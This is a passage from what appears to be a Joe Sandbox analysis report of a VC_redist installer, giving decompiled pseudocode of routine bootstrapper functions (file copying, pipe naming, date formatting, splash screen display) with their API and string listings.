                                                                          				intOrPtr* _t95;
                                                                          				intOrPtr* _t96;
                                                                          				intOrPtr* _t97;
                                                                          				intOrPtr* _t99;
                                                                          				signed int _t100;
                                                                          				signed int _t102;
                                                                          				signed int _t110;
                                                                          
                                                                          				_t99 = _a4;
                                                                          				_t94 =  &_v20;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t100 =  *((intOrPtr*)( *_t99 + 0x44))(_t99,  &_v20);
                                                                          				if(_t100 < 0) {
                                                                          					L26:
                                                                          					if(_v8 != 0) {
                                                                          						__imp__#6(_v8);
                                                                          					}
                                                                          					_t95 = _v12;
                                                                          					if(_t95 != 0) {
                                                                          						 *((intOrPtr*)( *_t95 + 8))(_t95);
                                                                          					}
                                                                          					_t96 = _v16;
                                                                          					if(_t96 != 0) {
                                                                          						 *((intOrPtr*)( *_t96 + 8))(_t96);
                                                                          					}
                                                                          					_t97 = _v20;
                                                                          					if(_t97 != 0) {
                                                                          						 *((intOrPtr*)( *_t97 + 8))(_t97);
                                                                          					}
                                                                          					return _t100;
                                                                          				}
                                                                          				_t68 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
                                                                          				_t92 = _a8;
                                                                          				while(1) {
                                                                          					_t100 = _t68;
                                                                          					_t102 = _t100;
                                                                          					if(_t102 != 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t69 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"type", 0xffffffff);
                                                                          					__eflags = _t69 - 2;
                                                                          					if(_t69 != 2) {
                                                                          						_t70 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"url", 0xffffffff);
                                                                          						__eflags = _t70 - 2;
                                                                          						if(_t70 != 2) {
                                                                          							L7:
                                                                          							__eflags = _v8;
                                                                          							if(_v8 != 0) {
                                                                          								__imp__#6(_v8);
                                                                          								_t19 =  &_v8;
                                                                          								 *_t19 = _v8 & 0x00000000;
                                                                          								__eflags =  *_t19;
                                                                          							}
                                                                          							_t94 = _v12;
                                                                          							__eflags = _t94;
                                                                          							if(_t94 != 0) {
                                                                          								 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                          								_t23 =  &_v12;
                                                                          								 *_t23 = _v12 & 0x00000000;
                                                                          								__eflags =  *_t23;
                                                                          							}
                                                                          							_t68 = E000536D7(_t94, _v20,  &_v12,  &_v8);
                                                                          							continue;
                                                                          						}
                                                                          						_push(_v12);
                                                                          						_push(_t92 + 4);
                                                                          						L6:
                                                                          						_t100 = E000567C4(_t94);
                                                                          						__eflags = _t100;
                                                                          						if(_t100 < 0) {
                                                                          							L25:
                                                                          							goto L26;
                                                                          						}
                                                                          						goto L7;
                                                                          					}
                                                                          					_push(_v12);
                                                                          					_push(_t92);
                                                                          					goto L6;
                                                                          				}
                                                                          				if(_t102 < 0) {
                                                                          					goto L25;
                                                                          				}
                                                                          				_t98 =  &_v16;
                                                                          				_t100 =  *((intOrPtr*)( *_t99 + 0x30))(_t99,  &_v16);
                                                                          				if(_t100 < 0) {
                                                                          					goto L25;
                                                                          				}
                                                                          				_t100 = E00053760( &_v16, _v16,  &_v12,  &_v8);
                                                                          				_t104 = _t100;
                                                                          				if(_t100 != 0) {
                                                                          					L23:
                                                                          					if(_t110 >= 0) {
                                                                          						_t100 = E000567C4(_t98, _t92 + 8, _t99);
                                                                          					}
                                                                          					goto L25;
                                                                          				}
                                                                          				_t84 = _t92 + 0xc;
                                                                          				while(1) {
                                                                          					_t100 = E000579CC(_t92, _t104, _v12, _t84);
                                                                          					if(_t100 < 0) {
                                                                          						goto L25;
                                                                          					}
                                                                          					if(_v8 != 0) {
                                                                          						__imp__#6(_v8);
                                                                          						_v8 = _v8 & 0x00000000;
                                                                          					}
                                                                          					_t98 = _v12;
                                                                          					if(_t98 != 0) {
                                                                          						 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                                          						_v12 = _v12 & 0x00000000;
                                                                          					}
                                                                          					_t100 = E00053760(_t98, _v16,  &_v12,  &_v8);
                                                                          					_t84 = _t92 + 0xc;
                                                                          					_t110 = _t100;
                                                                          					if(_t110 == 0) {
                                                                          						continue;
                                                                          					} else {
                                                                          						goto L23;
                                                                          					}
                                                                          				}
                                                                          				goto L25;
                                                                          			}





















                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,`Aet,000000FF,type,000000FF,?,?,`Aet,74654160), ref: 00056DFE
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056E49
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056EC5
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056F11
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Free$Compare
                                                                          • String ID: `Aet$crypt32.dll$feclient.dll$type$url
                                                                          • API String ID: 1324494773-1409380186
                                                                          • Opcode ID: 32528431ab580c853189b53c7839abe204f76b655818df37f6b65b1fbf7d332e
                                                                          • Instruction ID: 186664cce33afea57559b05f32331848964b4e3c83a04207c6c07804fb9ac40a
                                                                          • Opcode Fuzzy Hash: 32528431ab580c853189b53c7839abe204f76b655818df37f6b65b1fbf7d332e
                                                                          • Instruction Fuzzy Hash: 5D516075D01219FBCF15CB94C849EEFBBB8AF04722F5042A9E811EB161D7329E08DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00039A57(void* __ecx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                          				long _v8;
                                                                          				intOrPtr* _t22;
                                                                          				void* _t24;
                                                                          				signed short _t31;
                                                                          				signed int _t36;
                                                                          				long _t37;
                                                                          				signed short _t39;
                                                                          				intOrPtr _t46;
                                                                          				WCHAR* _t47;
                                                                          				intOrPtr* _t50;
                                                                          				intOrPtr* _t51;
                                                                          				intOrPtr _t53;
                                                                          				void* _t55;
                                                                          				long _t58;
                                                                          
                                                                          				_t55 = _a4;
                                                                          				_t58 = 0;
                                                                          				_v8 = 0;
                                                                          				_t46 = 0x5b524;
                                                                          				_t22 =  *((intOrPtr*)(_t55 + 4));
                                                                          				if(_t22 == 0) {
                                                                          					_t50 =  *((intOrPtr*)(_t55 + 8));
                                                                          					if(_t50 == 0) {
                                                                          						_t53 = 0x5b524;
                                                                          					} else {
                                                                          						_t53 =  *_t50;
                                                                          					}
                                                                          				} else {
                                                                          					_t53 =  *_t22;
                                                                          				}
                                                                          				_t51 =  *((intOrPtr*)(_t55 + 0xc));
                                                                          				if(_t51 != 0) {
                                                                          					_t46 =  *_t51;
                                                                          				}
                                                                          				if(_t22 == 0) {
                                                                          					_t24 =  !=  ? 0x20000152 : 0x2000014f;
                                                                          				} else {
                                                                          					_t24 = (0 | _t51 != 0x00000000) + 0x20000150;
                                                                          				}
                                                                          				_push(_a8);
                                                                          				_push("copy");
                                                                          				_push(_t46);
                                                                          				E0001550F(2, _t24, _t53);
                                                                          				_t47 = _a12;
                                                                          				if(E00054315(_t47,  &_v8) == 0) {
                                                                          					L14:
                                                                          					_t17 = _t55 + 0x20; // 0x20
                                                                          					if(CopyFileExW(_a8, _t47, E0003993C, _t55, _t17, _t58) == 0) {
                                                                          						if( *(_t55 + 0x20) == _t58) {
                                                                          							_t31 = GetLastError();
                                                                          							_t62 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							_t58 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "apply.cpp", 0x546, _t58);
                                                                          							_push(_t47);
                                                                          							_push(_a8);
                                                                          							_push("Failed attempt to copy payload from: \'%ls\' to: %ls.");
                                                                          						} else {
                                                                          							_t58 = 0x80070642;
                                                                          							E000137D3(_t29, "apply.cpp", 0x542, 0x80070642);
                                                                          							_push(_t47);
                                                                          							_push(_a8);
                                                                          							_push("BA aborted copy of payload from: \'%ls\' to: %ls.");
                                                                          						}
                                                                          						_push(_t58);
                                                                          						E0005012F();
                                                                          					}
                                                                          					goto L19;
                                                                          				} else {
                                                                          					_t36 = _v8;
                                                                          					if((_t36 & 0x00000001) == 0) {
                                                                          						goto L14;
                                                                          					}
                                                                          					_t37 = _t36 & 0xfffffffe;
                                                                          					_v8 = _t37;
                                                                          					if(SetFileAttributesW(_t47, _t37) != 0) {
                                                                          						goto L14;
                                                                          					}
                                                                          					_t39 = GetLastError();
                                                                          					_t65 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                          					_t58 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "apply.cpp", 0x538, _t58);
                                                                          					E0005012F(_t58, "Failed to clear readonly bit on payload destination path: %ls", _t47);
                                                                          					L19:
                                                                          					return _t58;
                                                                          				}
                                                                          			}


















                                                                          APIs
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000), ref: 00039AE1
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00039AEB
                                                                          • CopyFileExW.KERNEL32(00000000,00000000,0003993C,00000000,00000020,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00039B39
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00039B68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$AttributesCopy
                                                                          • String ID: @Met$BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                          • API String ID: 1969131206-4135901359
                                                                          • Opcode ID: 9927c3eb709544dd2f68c6c47d4137415cef324e196b6aa67a81e8f405c33797
                                                                          • Instruction ID: 57db9005d465054ae9c4f9fafba946c02c10326f826cf4be84e866eb645367fb
                                                                          • Opcode Fuzzy Hash: 9927c3eb709544dd2f68c6c47d4137415cef324e196b6aa67a81e8f405c33797
                                                                          • Instruction Fuzzy Hash: 4A31E471B40716BBFB219A65DC81EBBB7ADEF40751F108229BD09DB192E7A0DD0086E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • UuidCreate.RPCRT4(?), ref: 00024BC9
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 00024BF8
                                                                          • UuidCreate.RPCRT4(?), ref: 00024C43
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 00024C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromStringUuid
                                                                          • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                          • API String ID: 4041566446-2510341293
                                                                          • Opcode ID: 7296da34cc11a0d67edf8710d603488dbc9fe724dad225419d06095fc2af3ea5
                                                                          • Instruction ID: 027c290460b0fc1a142e6f28fe248d33ec27b47a5ec29fe6b9989da29ba09700
                                                                          • Opcode Fuzzy Hash: 7296da34cc11a0d67edf8710d603488dbc9fe724dad225419d06095fc2af3ea5
                                                                          • Instruction Fuzzy Hash: 9B41A072D01328EBDB61DBE4ED45EDEB7F8AB44711F204126EA05BF241D7749A44CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00056ACD(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr* _t36;
                                                                          				void* _t55;
                                                                          				intOrPtr _t59;
                                                                          				signed int _t61;
                                                                          				intOrPtr* _t62;
                                                                          				void* _t67;
                                                                          				void* _t68;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t36 = _a4;
                                                                          				_t60 =  *_t36;
                                                                          				_t67 =  *((intOrPtr*)( *_t36 + 0x30))(_t36,  &_v16);
                                                                          				if(_t67 >= 0) {
                                                                          					_t68 = E00053760(_t60, _v16,  &_v12,  &_v8);
                                                                          					if(_t68 != 0) {
                                                                          						L16:
                                                                          						_t67 =  >=  ? 0 : _t68;
                                                                          					} else {
                                                                          						_t59 = _a8;
                                                                          						do {
                                                                          							if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"name", 0xffffffff) != 2) {
                                                                          								if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"email", 0xffffffff) != 2) {
                                                                          									if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"uri", 0xffffffff) != 2) {
                                                                          										goto L11;
                                                                          									} else {
                                                                          										_t55 = _t59 + 8;
                                                                          										goto L9;
                                                                          									}
                                                                          								} else {
                                                                          									_t55 = _t59 + 4;
                                                                          									L9:
                                                                          									_push(_v12);
                                                                          									_push(_t55);
                                                                          									goto L10;
                                                                          								}
                                                                          							} else {
                                                                          								_push(_v12);
                                                                          								_push(_t59);
                                                                          								L10:
                                                                          								_t67 = E000567C4(_t60);
                                                                          								if(_t67 >= 0) {
                                                                          									goto L11;
                                                                          								}
                                                                          							}
                                                                          							goto L17;
                                                                          							L11:
                                                                          							if(_v8 != 0) {
                                                                          								__imp__#6(_v8);
                                                                          								_v8 = _v8 & 0x00000000;
                                                                          							}
                                                                          							_t60 = _v12;
                                                                          							if(_t60 != 0) {
                                                                          								 *((intOrPtr*)( *_t60 + 8))(_t60);
                                                                          								_v12 = _v12 & 0x00000000;
                                                                          							}
                                                                          							_t68 = E00053760(_t60, _v16,  &_v12,  &_v8);
                                                                          						} while (_t68 == 0);
                                                                          						goto L16;
                                                                          					}
                                                                          					L17:
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				_t61 = _v12;
                                                                          				if(_t61 != 0) {
                                                                          					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                          				}
                                                                          				_t62 = _v16;
                                                                          				if(_t62 != 0) {
                                                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                          				}
                                                                          				return _t67;
                                                                          			}














                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,`Aet,000000FF,name,000000FF,?,?,`Aet,?,74654160), ref: 00056B2B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,email,000000FF), ref: 00056B48
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056B86
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056BCD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$CompareFree
                                                                          • String ID: `Aet$email$feclient.dll$name$uri
                                                                          • API String ID: 3589242889-3428274497
                                                                          • Opcode ID: 7bd55627aac0e1c2dece23d632937f150c6292896a9f9f8fa9308935fed92a00
                                                                          • Instruction ID: d504d8aebfbf396d401358ec367ec26d56cd62f14a379b52b0f80cff157db0c0
                                                                          • Opcode Fuzzy Hash: 7bd55627aac0e1c2dece23d632937f150c6292896a9f9f8fa9308935fed92a00
                                                                          • Instruction Fuzzy Hash: CA414F35E04219BBEB61DB94CC45FAEB7B5EF04722F6042A5E911EB290C7329E48DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00015F14(void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				struct _SYSTEMTIME _v24;
                                                                          				short* _v28;
                                                                          				intOrPtr _v32;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t16;
                                                                          				int _t22;
                                                                          				void* _t37;
                                                                          				void* _t42;
                                                                          				int _t44;
                                                                          				void* _t45;
                                                                          				signed int _t50;
                                                                          
                                                                          				_t42 = __edx;
                                                                          				_t16 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t16 ^ _t50;
                                                                          				_v32 = _a8;
                                                                          				_v28 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				GetSystemTime( &_v24);
                                                                          				_t22 = GetDateFormatW(0x400, 1,  &_v24, 0, 0, 0);
                                                                          				_t37 = GetLastError;
                                                                          				_t44 = _t22;
                                                                          				if(_t44 != 0) {
                                                                          					L3:
                                                                          					_t45 = E00011EDE( &_v28, _t44);
                                                                          					if(_t45 >= 0) {
                                                                          						if(GetDateFormatW(0x400, 1,  &_v24, 0, _v28, _t44) != 0) {
                                                                          							L8:
                                                                          							_t45 = E000302F4(_v32, _v28, _t44);
                                                                          							if(_t45 < 0) {
                                                                          								_push("Failed to set variant value.");
                                                                          								goto L10;
                                                                          							}
                                                                          						} else {
                                                                          							_t45 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          							if(_t45 >= 0) {
                                                                          								goto L8;
                                                                          							} else {
                                                                          								E000137D3(_t32, "variable.cpp", 0x899, _t45);
                                                                          								_push("Failed to get the Date.");
                                                                          								goto L10;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to allocate the buffer for the Date.");
                                                                          						goto L10;
                                                                          					}
                                                                          				} else {
                                                                          					_t45 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                          					if(_t45 >= 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						E000137D3(_t34, "variable.cpp", 0x891, _t45);
                                                                          						_push("Failed to get the required buffer length for the Date.");
                                                                          						L10:
                                                                          						_push(_t45);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				if(_v28 != 0) {
                                                                          					E000554EF(_v28);
                                                                          				}
                                                                          				return E0003DE36(_t37, _v8 ^ _t50, _t42, _t44, _t45);
                                                                          			}

                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 00015F3F
                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00015F53
                                                                          • GetLastError.KERNEL32 ref: 00015F65
                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00015FB8
                                                                          • GetLastError.KERNEL32 ref: 00015FC2
                                                                          Strings
                                                                          • Failed to get the required buffer length for the Date., xrefs: 00015F89
                                                                          • Failed to allocate the buffer for the Date., xrefs: 00015FA0
                                                                          • Failed to get the Date., xrefs: 00015FE6
                                                                          • variable.cpp, xrefs: 00015F7F, 00015FDC
                                                                          • Failed to set variant value., xrefs: 00015FFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DateErrorFormatLast$SystemTime
                                                                          • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2700948981-3682088697
                                                                          • Opcode ID: 854611996e27806ee45524ac01d09bb99f5daa53a9ce9a77f850d82338178be8
                                                                          • Instruction ID: ac42b9ea2d061f42f5f0e26494f8b5d0a2c4f3797016c46394270d7181750abe
                                                                          • Opcode Fuzzy Hash: 854611996e27806ee45524ac01d09bb99f5daa53a9ce9a77f850d82338178be8
                                                                          • Instruction Fuzzy Hash: 5A31FB32A40715BFEB21ABE9CC42FEF7AA8EB44711F01002AFF01FB190D6719D4486A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E0002E05E(struct HINSTANCE__* _a4, void** _a8) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				struct tagMONITORINFO _v48;
                                                                          				struct tagPOINT _v56;
                                                                          				void* _v72;
                                                                          				void* _v76;
                                                                          				void _v80;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t33;
                                                                          				int _t36;
                                                                          				void* _t38;
                                                                          				struct HMONITOR__* _t44;
                                                                          				signed short _t60;
                                                                          				void** _t64;
                                                                          				signed int _t65;
                                                                          				void* _t67;
                                                                          				struct HINSTANCE__* _t75;
                                                                          				void* _t78;
                                                                          				void* _t79;
                                                                          				int _t80;
                                                                          				signed int _t84;
                                                                          
                                                                          				_t33 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t33 ^ _t84;
                                                                          				_t75 = _a4;
                                                                          				_t64 = _a8;
                                                                          				_t65 = 6;
                                                                          				_t80 = 0;
                                                                          				_t36 = memset( &_v80, 0, _t65 << 2);
                                                                          				_t67 = 0xa;
                                                                          				_t78 =  &_v48;
                                                                          				_v56.x = 0;
                                                                          				memset(_t78, _t36, 0 << 2);
                                                                          				_t79 = _t78 + _t67;
                                                                          				_v56.y = 0;
                                                                          				_t38 = LoadBitmapW(_t75, 1);
                                                                          				 *_t64 = _t38;
                                                                          				if(_t38 != 0) {
                                                                          					GetObjectW(_t38, 0x18,  &_v80);
                                                                          					_t64[1] = 0x80000000;
                                                                          					_t64[2] = 0x80000000;
                                                                          					_t64[3] = _v76;
                                                                          					_t64[4] = _v72;
                                                                          					_t44 = GetCursorPos( &_v56);
                                                                          					if(_t44 != 0) {
                                                                          						__imp__MonitorFromPoint(_v56.x, _v56.y, 2);
                                                                          						if(_t44 != 0) {
                                                                          							_v48.cbSize = 0x28;
                                                                          							if(GetMonitorInfoW(_t44,  &_v48) != 0) {
                                                                          								asm("cdq");
                                                                          								_t64[1] = (_v20 - _t64[3] - _v48.rcWork - _t75 >> 1) + _v48.rcWork;
                                                                          								asm("cdq");
                                                                          								_t64[2] = (_v16 - _v24 - _t64[4] - _t75 >> 1) + _v24;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t60 = GetLastError();
                                                                          					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					_t80 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "splashscreen.cpp", 0xe8, _t80);
                                                                          					_push("Failed to load splash screen bitmap.");
                                                                          					_push(_t80);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t64, _v8 ^ _t84, _t75, _t79, _t80);
                                                                          			}

                                                                          APIs
                                                                          • LoadBitmapW.USER32(?,00000001), ref: 0002E094
                                                                          • GetLastError.KERNEL32 ref: 0002E0A0
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0002E0E7
                                                                          • GetCursorPos.USER32(?), ref: 0002E108
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0002E11A
                                                                          • GetMonitorInfoW.USER32 ref: 0002E130
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                          • String ID: ($@Met$Failed to load splash screen bitmap.$splashscreen.cpp
                                                                          • API String ID: 2342928100-2066116584
                                                                          • Opcode ID: 3d5b30604a81ebe3b4ebcf70ab9a1c3fe52de86281709656c150dd63867c76b9
                                                                          • Instruction ID: f1f2498538c8613f7ada8a25440f62bab874749ab28dcb65d49152e720abf6d7
                                                                          • Opcode Fuzzy Hash: 3d5b30604a81ebe3b4ebcf70ab9a1c3fe52de86281709656c150dd63867c76b9
                                                                          • Instruction Fuzzy Hash: EE314F71A002159FDB50DFB8D985A9EBBF9EB08711F048129F904EB281DB74E901CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 43%
                                                                          			E000164B6(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				char _v528;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				char* _t14;
                                                                          				signed short _t15;
                                                                          				signed short _t23;
                                                                          				signed short _t27;
                                                                          				void* _t30;
                                                                          				void* _t36;
                                                                          				signed short _t39;
                                                                          				signed short _t42;
                                                                          				signed int _t46;
                                                                          
                                                                          				_t36 = __edx;
                                                                          				_t30 = __ebx;
                                                                          				_t10 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t10 ^ _t46;
                                                                          				_t37 = _a8;
                                                                          				E0003F670(_a8,  &_v528, 0, 0x208);
                                                                          				_t14 =  &_v528;
                                                                          				_push(0x104);
                                                                          				_push(_t14);
                                                                          				if(_a4 == 0) {
                                                                          					_t15 = GetSystemDirectoryW();
                                                                          					__eflags = _t15;
                                                                          					if(_t15 != 0) {
                                                                          						goto L6;
                                                                          					} else {
                                                                          						_t23 = GetLastError();
                                                                          						__eflags = _t23;
                                                                          						_t42 =  <=  ? _t23 : _t23 & 0x0000ffff | 0x80070000;
                                                                          						__eflags = _t42;
                                                                          						_t39 =  >=  ? 0x80004005 : _t42;
                                                                          						E000137D3(0x80004005, "variable.cpp", 0x77e, _t39);
                                                                          						_push("Failed to get 64-bit system folder.");
                                                                          						goto L11;
                                                                          					}
                                                                          				} else {
                                                                          					__imp__GetSystemWow64DirectoryW();
                                                                          					if(_t14 != 0) {
                                                                          						L6:
                                                                          						__eflags = _v528;
                                                                          						if(__eflags == 0) {
                                                                          							L9:
                                                                          							_t39 = E000302F4(_t37,  &_v528, 0);
                                                                          							__eflags = _t39;
                                                                          							if(_t39 < 0) {
                                                                          								_push("Failed to set system folder variant value.");
                                                                          								goto L11;
                                                                          							}
                                                                          						} else {
                                                                          							_t39 = E0001338F(0, __eflags,  &_v528, 0x104);
                                                                          							__eflags = _t39;
